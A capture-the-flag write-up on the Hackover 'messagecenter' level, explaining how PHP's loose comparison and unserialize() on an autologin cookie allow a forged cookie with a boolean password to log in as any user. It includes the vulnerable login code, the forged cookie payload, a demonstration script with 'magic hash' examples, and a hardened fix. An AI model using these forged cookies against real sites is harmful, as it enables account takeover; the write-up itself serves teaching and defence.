Hackover CTF – messagecenter

It has been a long time since my last writeup, so I decided to comment on a simple web level solved at «Hackover CTF». It is a very old vulnerability: PHP's loose (type-juggling) comparison combined with serialize()/unserialize(). The application has a web login with ordinary test users (demo, demo2) and a 'remember login' option that keeps us logged in by 'passing data' through an autologin cookie, which is where the vulnerability lives. The cookie originally looks like this (a serialized PHP array carrying the username and the password hash, the same 32-character hex value the database stores):

a:2:{s:8:"username";s:4:"demo";s:8:"password";s:32:"6388af9e3c3b76e5f053c0ff204f9228";}

Since we can see the application's source code, we start by looking for vulnerable spots in the do_login method and checking what is actually compared against the contents of this serialized cookie string.

function do_login($username, $pw_hash, $autologin)
{
	global $db;
	if (isset($_SESSION['user_id'])) {
		return true;
	}
	$sth = $db->prepare('SELECT id, password FROM account WHERE username = ?');
	$sth->bindValue(1, $username);
	$result = $sth->execute()->fetchArray();
	if ($result && $result['password'] == $pw_hash) { // <-- loose comparison (==) instead of strict (===)!
		$_SESSION['user_id'] = $result['id'];
		if ($autologin) {
			setcookie('autologin', serialize(array(
				'username' => $username,
				'password' => $pw_hash
			)), time() + 60*60*24*14);
		}
		header('Location: /');
		die();
	}
	return false;
}

if (isset($_COOKIE['autologin'])) {
	$data = @unserialize($_COOKIE['autologin']); // attacker-controlled cookie is deserialized here...
	do_login($data['username'], $data['password'], true); // ...and passed straight into the comparison
}

So the problem is that we can put a boolean true in the serialized password field. With the loose comparison (==), PHP converts the stored hash string to a boolean in order to compare it with true, and any non-empty string other than "0" is truthy, so "<hash>" == true succeeds whatever the hash is. A strict comparison (===) would fail because the types differ. The username is taken verbatim from the cookie, so we can choose any existing account (here Alice). Here is the forged cookie:

a:2:{s:8:"username";s:5:"Alice";s:8:"password";b:1;}

OK. That is all it takes to get the flag.

[Screenshot]
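The following script is an added example (not the challenge's code) that reproduces the loose-comparison bug from do_login in isolation: it shows why b:1 matches any stored hash, builds the forged cookie with serialize() exactly as the server would unserialize it, and contrasts it with a strict, constant-time check. The stored hash is a constructed value of the same shape as the one in the original cookie; the function name password_matches is my own. It also goes one step beyond the challenge with a second well-known == pitfall, two "0e..." MD5 hashes compared as numbers.

```php
<?php
// Added example: loose vs strict comparison of the password hash from an
// autologin cookie. Not the challenge's code.

// Stand-in for the 'password' column of the account table (constructed value).
$stored_hash = '6388af9e3c3b76e5f053c0ff204f9228';

// Loose comparison of a string against a bool converts the string to bool.
// Every non-empty string except "0" is truthy, so true == "<hash>" holds.
var_dump($stored_hash == true);   // bool(true)  <- the bug in do_login
var_dump($stored_hash === true);  // bool(false) <- strict comparison fails
var_dump($stored_hash == false);  // bool(false) <- b:0 would not work

// Same == pitfall, other direction: two numeric strings are compared as numbers.
// md5('240610708') and md5('QNKCDZO') both start with "0e", i.e. 0 * 10^n == 0.
var_dump('0e462097431906509019562988736854' == '0e830400451993494058024219903391'); // bool(true)

// Forge the cookie in the exact form the application unserializes.
$forged = serialize(['username' => 'Alice', 'password' => true]);
echo $forged, "\n";
// a:2:{s:8:"username";s:5:"Alice";s:8:"password";b:1;}

// Raw ';' and '"' would break cookie parsing; setcookie() url-encodes values
// and PHP decodes $_COOKIE, so send the encoded form in the Cookie header.
echo 'Cookie: autologin=', rawurlencode($forged), "\n";

// What the vulnerable server computes after unserialize():
$data = @unserialize($forged);
var_dump($result_loose = ($stored_hash == $data['password'])); // bool(true): logged in as Alice

// Hardened check: refuse non-string input, then compare in constant time.
function password_matches(string $stored, $supplied): bool
{
    if (!is_string($supplied)) {
        return false; // b:1, i:0, arrays etc. from a forged cookie never match
    }
    return hash_equals($stored, $supplied);
}

var_dump(password_matches($stored_hash, $data['password'])); // bool(false)
var_dump(password_matches($stored_hash, $stored_hash));      // bool(true)
```

Note that even the strict check only closes the type-juggling hole: the cookie still carries the stored password hash itself, so anyone who reads it can replay it for two weeks. A remember-me cookie should hold an opaque random token looked up server-side, not a value that the database also uses as the credential.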

If you are interested in this PHP serialize/unserialize vulnerability class and others like it, see this PDF:
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20POC2009%20Shocking%20News%20In%20PHP%20Exploitation.pdf
